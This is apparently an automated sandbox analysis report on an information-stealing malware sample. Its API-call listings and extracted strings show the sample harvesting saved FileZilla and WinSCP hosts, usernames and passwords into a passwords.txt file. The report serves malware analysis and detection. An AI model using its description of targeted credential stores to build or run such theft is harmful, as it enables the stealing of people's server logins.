                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0), ref: 0040D4EA
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D4F1
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0), ref: 0040D4F8
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D4FF
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0), ref: 0040D514
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D51B
                                                                                                                                                                                                • strcpy_s.MSVCRT ref: 0040D52E
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0040D53F
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460), ref: 0040D546
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D568
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D56F
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D576
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D57D
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D595
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D59C
                                                                                                                                                                                                • strcpy_s.MSVCRT ref: 0040D5AF
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D5C0
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D5C7
                                                                                                                                                                                                  • Part of subcall function 0040D1D6: strlen.MSVCRT ref: 0040D1ED
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D5D0
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D5E0
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D5E7
                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D613
                                                                                                                                                                                                • strcpy_s.MSVCRT ref: 0040D637
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,00000001,00000000,?,?,00000000), ref: 0040D660
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D667
                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D66C
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000001,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D677
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D67E
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D68F
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D696
                                                                                                                                                                                                • strcpy_s.MSVCRT ref: 0040D6A4
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0040D6B0
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460), ref: 0040D6B7
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0040D6DD
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 0040D6E4
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000010), ref: 0040D6EB
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040D6F2
                                                                                                                                                                                                • strcpy_s.MSVCRT ref: 0040D70A
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0040D71B
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 0040D722
                                                                                                                                                                                                • strlen.MSVCRT ref: 0040D770
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0040D7B4
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460), ref: 0040D7BB
                                                                                                                                                                                                  • Part of subcall function 0040D284: strchr.MSVCRT ref: 0040D2E3
                                                                                                                                                                                                  • Part of subcall function 0040D284: lstrlenA.KERNEL32(?), ref: 0040D301
                                                                                                                                                                                                  • Part of subcall function 0040D284: GetProcessHeap.KERNEL32(00000008,-00000001), ref: 0040D30E
                                                                                                                                                                                                  • Part of subcall function 0040D284: HeapAlloc.KERNEL32(00000000), ref: 0040D315
                                                                                                                                                                                                  • Part of subcall function 0040D284: strcpy_s.MSVCRT ref: 0040D350
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0040D807
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 0040D80E
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$H_prologstrchrstrlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2599614518-0
                                                                                                                                                                                                • Opcode ID: cf0ecef83dbbc2a2af86740d8966e5d5e0cd88ed1842b8b923e0d93c82f5e9c9
                                                                                                                                                                                                • Instruction ID: 4e96a980e3ef2b1513e6b26e3c3319686b662b6b78d9b075673ba62ee632f77c
                                                                                                                                                                                                • Opcode Fuzzy Hash: cf0ecef83dbbc2a2af86740d8966e5d5e0cd88ed1842b8b923e0d93c82f5e9c9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 89E11975C0021AAFDF11AFE0DD89AAFBB79FF08304F10182AF605B2191DB795A04DB65
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 004162F9 Relevance: 89.4, APIs: 42, Strings: 9, Instructions: 170libraryloaderCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re, xrefs: 0041637B
                                                                                                                                                                                                • The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser, xrefs: 0041631C
                                                                                                                                                                                                • GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re, xrefs: 00416303
                                                                                                                                                                                                • kernel32.dll, xrefs: 0041630F
                                                                                                                                                                                                • GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re, xrefs: 0041632B
                                                                                                                                                                                                • hhB, xrefs: 0041636C
                                                                                                                                                                                                • The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser, xrefs: 004162F9
                                                                                                                                                                                                • The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser, xrefs: 00416345
                                                                                                                                                                                                • GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re, xrefs: 0041634F
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressProc$wcslen$LibraryLoad
                                                                                                                                                                                                • String ID: GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re$GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re$GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re$GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re$The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser$The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser$The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser$hhB$kernel32.dll
                                                                                                                                                                                                • API String ID: 3854642915-181006640
                                                                                                                                                                                                • Opcode ID: 49624ccbf360a564c1010e240798a798749cb03028986dfc02c2b02ef391c22b
                                                                                                                                                                                                • Instruction ID: 1cd199677c0e39bd8442f48b4b18fd990d60752aa228bc5dae81643b434566b1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 49624ccbf360a564c1010e240798a798749cb03028986dfc02c2b02ef391c22b
                                                                                                                                                                                                • Instruction Fuzzy Hash: C2815D7E910620EFEB526FA0FD09A253FB3F70AB01B14613AFA0586231DB764461EF14
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040AC6F Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 370stringmemoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040AC74
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040FD0C: SHGetFolderPathA.SHELL32(00000000,{LB,00000000,00000000,?), ref: 0040FD3D
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 004061D7: _EH_prolog.MSVCRT ref: 004061DC
                                                                                                                                                                                                  • Part of subcall function 004061D7: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061FF
                                                                                                                                                                                                  • Part of subcall function 004061D7: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                                                                                                                                  • Part of subcall function 004061D7: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406232
                                                                                                                                                                                                  • Part of subcall function 004061D7: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0040624C
                                                                                                                                                                                                  • Part of subcall function 004061D7: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040626D
                                                                                                                                                                                                  • Part of subcall function 0040FD58: LocalAlloc.KERNEL32(00000040,004120FA,00000001,00000000,?,004120F9,00000000,00000000), ref: 0040FD71
                                                                                                                                                                                                • strtok_s.MSVCRT ref: 0040AD52
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,000F423F,00424C83,00424C82,00424C7F,00424C7E), ref: 0040ADA6
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040ADAD
                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040ADC1
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040ADCC
                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040AE04
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040AE0F
                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,<User>), ref: 0040AE4D
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040AE58
                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040AE96
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040AEA5
                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 0040B0A0
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00413452: _EH_prolog.MSVCRT ref: 00413457
                                                                                                                                                                                                  • Part of subcall function 00413452: CreateThread.KERNEL32(00000000,00000000,0041224D,?,00000000,00000000), ref: 004134FD
                                                                                                                                                                                                  • Part of subcall function 00413452: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413505
                                                                                                                                                                                                • memset.MSVCRT ref: 0040B0F3
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prologlstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitmemsetstrtok_s
                                                                                                                                                                                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                                                • API String ID: 486015307-935134978
                                                                                                                                                                                                • Opcode ID: 564934eb4a25a7736fa8064f1783098efac6b1bf6649aef7254b508f9c503ce9
                                                                                                                                                                                                • Instruction ID: 83f3163c125aebec936b1d4574ab15b9c6d5ce20d7e9d796607a94d6cee3af00
                                                                                                                                                                                                • Opcode Fuzzy Hash: 564934eb4a25a7736fa8064f1783098efac6b1bf6649aef7254b508f9c503ce9
                                                                                                                                                                                                • Instruction Fuzzy Hash: AAE18371D00228AADB05EBE5DD46EEEBB79BF15304F50086EF501B21D2DB781A18CB69
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040D838 Relevance: 63.4, APIs: 22, Strings: 14, Instructions: 411registryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040D83D
                                                                                                                                                                                                • memset.MSVCRT ref: 0040D866
                                                                                                                                                                                                • memset.MSVCRT ref: 0040D886
                                                                                                                                                                                                • memset.MSVCRT ref: 0040D89A
                                                                                                                                                                                                • memset.MSVCRT ref: 0040D8AE
                                                                                                                                                                                                • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                                • memset.MSVCRT ref: 0040D8CB
                                                                                                                                                                                                • memset.MSVCRT ref: 0040D8DC
                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040D904
                                                                                                                                                                                                • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040D92C
                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040D973
                                                                                                                                                                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040D990
                                                                                                                                                                                                • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,00000000,?,Host: ,00000000,?,Soft: WinSCP,00424C4E), ref: 0040DA22
                                                                                                                                                                                                • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,00000000,?,?), ref: 0040DA74
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$Value$Open$EnumH_prolog
                                                                                                                                                                                                • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                                                • API String ID: 784052110-2798830873
                                                                                                                                                                                                • Opcode ID: 2f94ce2228e2c8618d847b394fe03628773b1532b970f34706a803fed8cc19af
                                                                                                                                                                                                • Instruction ID: 99f3b0c8384fb080216de6c06ccbf3f36086a493a44c68c92d102b3ca48b793e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f94ce2228e2c8618d847b394fe03628773b1532b970f34706a803fed8cc19af
                                                                                                                                                                                                • Instruction Fuzzy Hash: FAF129B1D00259AEDB11EBE1DC81EEEBB7CAF18304F1445ABA505B3182DB785B48CB75
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00408428 Relevance: 59.8, APIs: 33, Strings: 1, Instructions: 258stringmemoryfileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040842D
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040852D
                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00408535
                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00408541
                                                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT ref: 0040854B
                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040855C
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408568
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040856F
                                                                                                                                                                                                • StrStrA.SHLWAPI(?), ref: 00408581
                                                                                                                                                                                                • StrStrA.SHLWAPI(-00000010), ref: 0040859B
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 004085AF
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 004085C1
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424DA0), ref: 004085CF
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 004085E1
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424DA4), ref: 004085EF
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 004085FE
                                                                                                                                                                                                • lstrcat.KERNEL32(?,-00000010), ref: 00408608
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424DA8), ref: 00408616
                                                                                                                                                                                                • StrStrA.SHLWAPI(-000000FE), ref: 00408626
                                                                                                                                                                                                • StrStrA.SHLWAPI(00000014), ref: 00408636
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 0040864A
                                                                                                                                                                                                  • Part of subcall function 0040832A: memset.MSVCRT ref: 00408351
                                                                                                                                                                                                  • Part of subcall function 0040832A: lstrlenA.KERNEL32(00408656,00000001,?,00000014,00000000,00000000,?,00408656,00000014), ref: 0040836B
                                                                                                                                                                                                  • Part of subcall function 0040832A: CryptStringToBinaryA.CRYPT32(00408656,00000000,?,00408656,00000014), ref: 00408375
                                                                                                                                                                                                  • Part of subcall function 0040832A: memcpy.MSVCRT ref: 004083DD
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0040865B
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424DAC), ref: 00408669
                                                                                                                                                                                                • StrStrA.SHLWAPI(-000000FE), ref: 00408679
                                                                                                                                                                                                • StrStrA.SHLWAPI(00000014), ref: 00408689
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 0040869D
                                                                                                                                                                                                  • Part of subcall function 0040832A: lstrcat.KERNEL32(00424BDF,00424BE3), ref: 00408404
                                                                                                                                                                                                  • Part of subcall function 0040832A: lstrcat.KERNEL32(00424BDF,00424BE6), ref: 0040841C
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 004086AE
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424DB0), ref: 004086BC
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424DB4), ref: 004086CA
                                                                                                                                                                                                • StrStrA.SHLWAPI(-000000FE), ref: 004086DA
                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 004086F0
                                                                                                                                                                                                • memset.MSVCRT ref: 00408743
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040874C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
